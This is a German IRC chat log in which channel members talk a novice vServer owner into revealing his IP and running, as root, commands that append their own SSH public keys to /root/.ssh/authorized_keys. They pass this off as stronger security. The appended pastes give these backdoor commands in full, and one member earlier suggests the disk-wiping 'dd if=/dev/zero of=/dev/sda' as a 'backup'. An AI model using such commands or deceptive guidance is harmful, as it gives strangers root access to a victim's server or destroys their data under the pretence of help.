User0815 konfiguriert die Sicherheit

MR 20160410T14:05:50Z 000 <tchab> user012@webchat, wie ist denn die IP von deinem Server?
MR 20160410T14:05:58Z 000 <user012@webchat> Das AV Programm von denen besteht zu 75% aus AdWare
MR 20160410T14:06:09Z 000 <tö> Genau wir lügen nicht, so wie gerade am Anfang dieses Satzes.
MR 20160410T14:06:11Z 000 <user012@webchat> Sag ich nicht?
MR 20160410T14:06:22Z 000 <tchab> Weil?
MR 20160410T14:06:27Z 000 <tchab> Du keine Ahnung hast ob  er sicher genug ist.
MR 20160410T14:06:33Z 000 <root> Security through obscurity?
MR 20160410T14:06:42Z 000 <user012@webchat> Nein das nicht
MR 20160410T14:06:51Z 000 <tchab> Na dann, was hast du zu befürchten?
MR 20160410T14:06:53Z 000 <user012@webchat> Es ist sicher genug
MR 20160410T14:07:01Z 000 <tchab> Dann kannst du uns ja die IP geben.
MR 20160410T14:07:10Z 000 <user012@webchat> sftp://164.132.22.64
MR 20160410T14:07:14Z 000 <user012@webchat> Hier
MR 20160410T14:07:25Z 000 <user012@webchat> statt sfpt http schreiben
MR 20160410T14:08:16Z 000 <david> dir ist bewusst, dass das sftp:// nicht zur IP gehört?
MR 20160410T14:08:19Z 000 <user012@webchat> Wegen euch musste ich apache usw. neu installieren
MR 20160410T14:08:25Z 000 <user012@webchat> Ja
MR 20160410T14:08:33Z 000 <root> wieso wegen uns?
MR 20160410T14:08:37Z 000 <user012@webchat> Hab es aus filezilla rauskopiert
MR 20160410T14:08:52Z 000 <user012@webchat> Weil ihr mir diesen Befehl gegeben habt
MR 20160410T14:09:01Z 000 <root> welchen?
MR 20160410T14:09:21Z 000 <kochmarkus> ich hab mal ein dd if=/dev/zero of=/dev/sda als backup vorgeschlagen
MR 20160410T14:09:33Z 000 <user012@webchat> Backup?
MR 20160410T14:09:53Z 000 <user012@webchat> Das würde ich nicht auf der selben Platte machen
MR 20160410T14:09:57Z 000 <sebulon@webchat> ich hab gestern vorgeschlagen, er soll statt zero random als Installationsmedium nehmen
MR 20160410T14:09:59Z 000 <kochmarkus> tja, wenn du regelmäßig ein backup machst ersparst du dir natürlich das neu aufsetzten
MR 20160410T14:10:04Z 000 <tö> Netgear DG834G? ^^
MR 20160410T14:10:05Z 000 <tchab> user012@webchat, http://paste42.de/10459/ schau her, das skript hilft dir sicher.
MR 20160410T14:10:21Z 000 <tchab> Habe hinten deine IP eingetragen, damit es auch stimmt.
MR 20160410T14:10:32Z 000 <kochmarkus> ohne http würde es besser klappen
MR 20160410T14:10:41Z 000 <tchab> ach, wusst ich gar nicht, danke!
MR 20160410T14:10:47Z 000 <user012@webchat> ja
MR 20160410T14:11:03Z 000 <user012@webchat> was ist das da? AAAB3NzaC1yc2EAAAADAQABAAABAQDUL6B0ZrbsyRK1WxhyMrKlFSp+zldWWgekGs+Lw2dfu1TjwpFlbfKPvWWJMCzO5h6uZhtzcY3lpABuJQlSi77ZqKsa8URZF13Qbbj9PSc+gvnyeT77CEBMA3foHri
MR 20160410T14:11:06Z 000 <root> aber als root ausführen, sonst funktioniert das natürlich nicht
MR 20160410T14:11:07Z 000 <sebulon@webchat> user, die Idee von tchab ist gut...
MR 20160410T14:11:09Z 000 <tchab> ein ssh key user012@webchat
MR 20160410T14:11:22Z 000 <tchab> damit kannst du server besser absichern als durch passwörter
MR 20160410T14:11:28Z 000 <sebulon@webchat> dann bist abgesichert und du hast den Keay auf noch von einer vertrauenswürdigen Person
MR 20160410T14:11:41Z 000 <user012@webchat> Wartet mal
MR 20160410T14:11:47Z 000 <user012@webchat> das ist ein Passwort hash
MR 20160410T14:11:53Z 000 <user012@webchat> Dann habt ihr das Passwort
MR 20160410T14:11:56Z 000 <user012@webchat> oder?
MR 20160410T14:11:56Z 000 <tchab> nein
MR 20160410T14:11:59Z 000 <sebulon@webchat> das ist ein key kein hash
MR 20160410T14:12:00Z 000 <tchab> Wir haben kein Passwort
MR 20160410T14:12:03Z 000 <tchab> wie auch
MR 20160410T14:12:07Z 000 <user012@webchat> Werdet ihr aber
MR 20160410T14:12:10Z 000 <user012@webchat> wenn ich das eintippe
MR 20160410T14:12:11Z 000 <tchab> ne, wie soll das gehen?
MR 20160410T14:12:22Z 000 <user012@webchat> Warte
MR 20160410T14:12:26Z 000 <tchab> das fügt nur einen key zu einer datei hinzu
MR 20160410T14:12:33Z 000 <david> user012@webchat: das skript hat rein gar nichts mit einem passwort zu tun. Wie bereits gesagt ist das ein Public Key
MR 20160410T14:12:35Z 000 <tö> Den key sollte man aber auch nicht ins internet schreien
MR 20160410T14:12:49Z 000 <tchab> tö, ja hier können wir uns ja vertrauen ;)
MR 20160410T14:12:50Z 000 <sebulon@webchat> rihtig, du musst drauf aufpassen
MR 20160410T14:12:56Z 000 <tö> ahja
MR 20160410T14:13:02Z 000 <tö> mein fehler :P
MR 20160410T14:13:04Z 000 <tchab> wir waren lange genug gemein zum user012@webchat
MR 20160410T14:13:08Z 000 <user012@webchat> Auf ein Public key aufpassen?
MR 20160410T14:13:16Z 000 <sebulon@webchat> sicher dir den, damit du ihn nciht verlierst
MI 20160410T14:13:18Z 000 willstdueswissen <willstdueswissen@jabber.lima-city.de/lima-city Talkr Webchat> has joined
MR 20160410T14:13:23Z 000 <tö> wuff
MR 20160410T14:13:27Z 000 <sebulon@webchat> sonst muss der Tchab dir einen neuen machen
MR 20160410T14:13:32Z 000 <willstdueswissen> :OOOO
MR 20160410T14:13:37Z 000 <tchab> Und das mache ich sicher nicht!
MR 20160410T14:13:39Z 000 <willstdueswissen> Teeeee \o/
MR 20160410T14:13:40Z 000 <kochmarkus> noch besser ist es, wenn du zwei keys verwendest, doppel hält besser:
MR 20160410T14:13:43Z 000 <sebulon@webchat> und das macht der alle paar jahre nur, ich bin hier nun schon 6 jahre, mir hat er keinen key gemacht
MR 20160410T14:13:43Z 000 <kochmarkus> https://pastr.markusko.ch/show/570a5ee402912b40e2020000
MR 20160410T14:13:45Z 000 <tö> willi :D
MR 20160410T14:14:05Z 000 <tchab> oh, der vom kochmarkus ist auch gut, stärker als meiner
MR 20160410T14:14:09Z 000 <willstdueswissen> was machst du denn hier :D
MR 20160410T14:14:14Z 000 <willstdueswissen> gehts dir gut:D
MR 20160410T14:14:16Z 000 <tö> mach dir halt selber einen sebulon :P
MR 20160410T14:14:19Z 000 <kochmarkus> steht ja auch supersecure dabei
MR 20160410T14:14:24Z 000 <tö> ich bin hier nur für cybermobbing
MR 20160410T14:14:25Z 000 <sebulon@webchat> ey, mir habt ihr noch nie nen Key gegeben und diesem neuling gebt ihr alle Keys, das ist gemein...
MR 20160410T14:14:28Z 000 <tö> mir gehts prima ^^
MR 20160410T14:14:29Z 000 <user012@webchat> Ok habs
MR 20160410T14:14:51Z 000 <sebulon@webchat> @tö: ich brauch ihn von einer vertrauenswürdigen instanz wie tchab... wem soll ich sonst trauen^^
MR 20160410T14:14:56Z 000 <willstdueswissen> das ist schön :D
MR 20160410T14:15:03Z 000 <user012@webchat> ja
MR 20160410T14:15:07Z 000 <tchab> user012@webchat, den vom kochmarkus auch? doppel hält besser
MR 20160410T14:15:09Z 000 <tö> frag mal auf 4chan nach, sebulon
MR 20160410T14:15:11Z 000 <user012@webchat> was ist jetzt passiert?
MR 20160410T14:15:14Z 000 <tö> denen kann man immer vertrauen
MR 20160410T14:15:16Z 000 <user012@webchat> ja
MR 20160410T14:15:25Z 000 <user012@webchat> hab jetzt beide
MR 20160410T14:15:39Z 000 <david> user012@webchat: der hier ist supersupersecure: http://paste42.de/10460/
MR 20160410T14:15:39Z 000 <tchab> dann musst du noch kurz den server neu starten
MR 20160410T14:15:43Z 000 <tchab> damit das wirksam wird
MR 20160410T14:15:48Z 000 <david> sebulon@webchat: du darfst den auch verwenden, wenn Du willst :D
MR 20160410T14:15:51Z 000 <user012@webchat> mit dem Befehl?
MR 20160410T14:16:00Z 000 <tchab> einfach reboot eingeben
MR 20160410T14:16:16Z 000 <user012@webchat> ok
MR 20160410T14:16:26Z 000 <tchab> deine webseite erscheint hier nämlich noch nicht als sicher
MR 20160410T14:16:30Z 000 <sebulon@webchat> user, der key von david ist meiner
MR 20160410T14:16:38Z 000 <sebulon@webchat> den lässt du^^
MR 20160410T14:16:43Z 000 <user012@webchat> Ihr habt mich reingelegt oder?
MR 20160410T14:16:48Z 000 <root> nein
MR 20160410T14:17:07Z 000 <user012@webchat> Wie kann ich mich jetzt da einloggen?
MR 20160410T14:17:20Z 000 <tchab> was meinst du mit einloggen? so wie immer
MR 20160410T14:17:28Z 000 <david> is ok, jetzt hat der sebulon@webchat dir den key weggeschnappt, aber 2 sollten reichen.
MR 20160410T14:17:52Z 000 <user012@webchat> ja aber was haben die dinger gebracht?
MR 20160410T14:18:00Z 000 <tchab> bessere verschlüsselung
MR 20160410T14:18:02Z 000 <root> mehr Sicherheit!
MR 20160410T14:18:07Z 000 <tchab> sollte man gleich auf der Webseite sehen
MR 20160410T14:18:07Z 000 <user012@webchat> jaja
MR 20160410T14:18:14Z 000 <user012@webchat> SSH ist sicher gemig
MR 20160410T14:18:16Z 000 <user012@webchat> genug
MR 20160410T14:18:21Z 000 <sebulon@webchat> ah, mit davids key fühl ich mich doch gleich viel sicherer
MR 20160410T14:18:26Z 000 <tchab> ne, das liegt nur zufällig in .ssh user012@webchat
MR 20160410T14:18:37Z 000 <tchab> linux hat da keinen wirklichen standard für
MR 20160410T14:18:40Z 000 <tö> klar, ssh ist ja sowieso immer genau gleich bei allen, egal ob konfiguriert oder nicht
MR 20160410T14:18:41Z 000 <user012@webchat> Sollte ich da nicht Lets encrypt verwenden?
MR 20160410T14:18:50Z 000 <tö> wenn ich mir auf die stirn ssh schreibe, darf mich keiner hauen
MR 20160410T14:18:55Z 000 <sebulon@webchat> das ist, als hätte bill gates persönlich mein Zertifikat signiert
MR 20160410T14:18:56Z 000 <tchab> letsencrypt ist wieder was anderes
MR 20160410T14:19:15Z 000 <user012@webchat> was genau wird da verschlüsselt?
MR 20160410T14:19:23Z 000 <tchab> die verbindung
MR 20160410T14:19:27Z 000 <tchab> besser gesagt alle verbindungen
MR 20160410T14:19:28Z 000 <user012@webchat> Welche?
MR 20160410T14:19:36Z 000 <tö> m(
MR 20160410T14:19:37Z 000 <user012@webchat> Auch ftp?
MR 20160410T14:19:41Z 000 <tchab> klar
MR 20160410T14:19:47Z 000 <sebulon@webchat> wenn du über den ssh gehst ja
MR 20160410T14:19:48Z 000 <user012@webchat> Ja ne is klar
MR 20160410T14:20:01Z 000 <tö> Informier dich bei einer Quelle der du vertraust
MR 20160410T14:20:10Z 000 <tö> Dann lernst du auch was und musst nicht immer andere fragen
MR 20160410T14:20:14Z 000 <tö> Macht 100€
MR 20160410T14:20:15Z 000 <user012@webchat> ok wartet
MR 20160410T14:20:29Z 000 <user012@webchat> ich zahl aber nicht :D
MR 20160410T14:20:38Z 000 <tö> Dann schick ich mal die Jungs los
MR 20160410T14:20:45Z 000 <tchab> Der tö freelanced ja doch.
MR 20160410T14:20:49Z 000 <user012@webchat> Ja mach ruhig
MR 20160410T14:21:26Z 000 <david> ist der Server eigentlich noch am neustarten?
MR 20160410T14:22:08Z 000 <user012@webchat> nein
MR 20160410T14:22:15Z 000 <user012@webchat> Habe die index.html entfernt
MR 20160410T16:35:42Z 000 <david> vielleicht sollten wir mal ne mail an abuse@ovh.net schicken, dass da wer keine Ahnung vom vServer hat…
MR 20160410T16:35:49Z 000 <user012@webchat> ovh?
MR 20160410T16:35:56Z 000 <root> david: das darfst dann du gleich tun ;)
MR 20160410T16:36:00Z 000 <user012@webchat> Mach ruhig
MR 20160410T16:36:06Z 000 <user012@webchat> der ist nicht mein Anbieter
MR 20160410T16:36:16Z 000 <root> sondern?
MR 20160410T16:36:24Z 000 <root> am Ende hat er selbst die IP nur erlogen …
MR 20160410T16:36:26Z 000 <david> Warum gehört denen dann die IP?
MR 20160410T16:36:27Z 000 <user012@webchat> Kennst du eh nicht
MR 20160410T16:36:39Z 000 <user012@webchat> delta-networks.net
MR 20160410T16:36:50Z 000 <user012@webchat> weil mein anbieter das von denen gemietet hat?
MR 20160410T16:36:55Z 000 <david> ja, die stehen da auch drinnen
MR 20160410T16:37:05Z 000 <user012@webchat> Nitrado hat seine auch von Link11 
MR 20160410T16:37:07Z 000 <user012@webchat> schau mal nach
MR 20160410T16:37:14Z 000 <david> abuse-mailbox:  support@delta-networks.de
MR 20160410T16:37:25Z 000 <david> denen kann man auch ne email schicken
MR 20160410T16:37:32Z 000 <user012@webchat> Dann mach ruhig
MR 20160410T16:37:57Z 000 <user012@webchat> In den AGBS(habs gelesen) steht nirgends, dass man die server wegen unwissenheit kündigt
MR 20160410T16:38:25Z 000 <user012@webchat> Sonst würden die zuerst nen quiz oder so machen
MR 20160410T16:38:28Z 000 <sebulon@webchat> user, ein abschließender Tipp zu der Thematik: installier dir vmware oder andere virtualisierungssoftware
MR 20160410T16:38:34Z 000 <sebulon@webchat> mach dir da ein linux
MR 20160410T16:38:43Z 000 <sebulon@webchat> und lerne hinter abgeschottetem internet
MR 20160410T16:38:50Z 000 <user012@webchat> Geht nicht
MR 20160410T16:38:55Z 000 <user012@webchat> Will ich nicht
MR 20160410T16:39:04Z 000 <sebulon@webchat> dann lass es bleiben
MR 20160410T16:39:30Z 000 <user012@webchat> Und wenn ihr weiter so nett zu mir seid dann bleibe ich weiterhin bei meinem vServer
MR 20160410T16:39:40Z 000 <sebulon@webchat> mach was du denkst
MR 20160410T16:39:54Z 000 <sebulon@webchat> ist nur blöd, wenn du vorbestraft nach einem Job suchen wirst
MR 20160410T16:40:03Z 000 <user012@webchat> vorbestraft?
MR 20160410T16:40:12Z 000 <sebulon@webchat> und die ersten 10 jahre nur dafür ackern wirst, deine strafe abzubezahlen
MR 20160410T16:40:14Z 000 <root> /me hofft schon mal, dass möglichst bald irgendwer anders sich Zugriff auf den vServer holt, und dass dies möglichst unangenehme Folgen für den user hat

Info

https://paste42.de/10459/
# SERVER MIT SSH KEY ABSICHERN
echo "ssh-rsa AAAB3NzaC1yc2EAAAADAQABAAABAQDUL6B0ZrbsyRK1WxhyMrKlFSp+zldWWgekGs+Lw2dfu1TjwpFlbfKPvWWJMCzO5h6uZhtzcY3lpABuJQlSi77ZqKsa8URZF13Qbbj9PSc+gvnyeT77CEBMA3foHrijj1d+K9CcB8f6BIBpUUGjwopvNf07iwbY9WZmLt2hKfxlMRbD8imDmxwzjuRM9GGXKD/MCG2M4tE+O8rLORpYotdw9X+lS6KRKnM2Yl6tjxj0B5/WeJYTSEglLZdU5GOXNpcfkfhhW4HgVX3a03Fmmf30XZJFaRTSsA/ZiWvhiiNGtexmqqw6GSotc4Eq5T94qX04wFzed+IOEUr9BnAtDvUT http://164.132.22.64" >> /root/.ssh/authorized_keys
https://pastr.markusko.ch/show/570a5ee402912b40e2020000
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCqhkU8jNEWe/dF4cUP1KblaaKklNgbAt9pa4FXD8Yh21qYInyNCErkh0iP2UQW1Y9txxHFDLrrrHj0q4VxG9y79got6OCfVlhQuhuytshGKuOS6Pgb/wfD3xJ2J5TxLGohWHL28bDTgxzDjgckhtJ26KVwzXcjj3GI9zP4whfgsFhfuitg4CLQiZUaf/yr1wNTkUehJWqPZWKVY6eS9Ci2L4gPTRNUwr5u5TXp/keTrQzgwIoSMMAG5ZbBjZOGjiWS4sYL3FvyQ8zFX6Pz3MLam45d/v7otzPc4O75W0qr2AFLCiK8ebnevGOmhQ3KTjNCPGpTgni+I/DP50YF6/lVhxtjsU/Tb8/wWuhHY6UPlR9TuPTDFk51OQ+Xi09S0Iv4pODMVGPioJ88x5m8+P7cnwjZxFEdtXjsMNdjZwfCOvXymGwOgeu5yiHq+khFMAPdU9XHYp3FQKT7vj0fJ4mKd9x2lG0wXpBi2bqTzlpI8L/sg4ziDhztJP/wRdqkYYC7LI80omSBWoc/dP4EcPS0AvFm4YUt5m/KgjHNAbah2X3K8hKujc9wnEe6hUzZ0kVzO6R2YxRKMxg446oBWSRs5rZi7IY4k82hhkRy0myOBmKJYOSJhxq0gVl33b842FcouW0RJwiWdhU8hybY++XG1/ri9ll0fSI4YE+729oFdQ== supersecure" >> /root/.ssh/authorized_keys
https://paste42.de/10460/
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpZYP5MSLa0Qy+RRiV8LT57j3nr9ZrSZLsAZUp8Wc1T3VyxFLytaMvwEiLV+ogqUCffzvR+zZoBtowOYf6sG7JcR9otogGQ6qmrWJ+L7X8f+YM/1RLLYqq8LCbOYOGBRbaJlARyndLFR5AzJ6/ADMKaSo6LLzuk6T3mNr/9TFM+hn8fvJnC8hJQQUHtVizEn6VZ99Oi95Yn17U9JM+9m2BLv08o2cWKYjBln9JzlHhzUM+kvhzLHRoEt8PXxBJELZ5rlX516VmSktf4Gs6024fhTaMKroUWppOeXIyTR/DbQGc9j99PgACOi16yGMVOSqKSGfmCCftvcNA/UGxiWcB supersupersecure" >> /root/.ssh/authorized_keys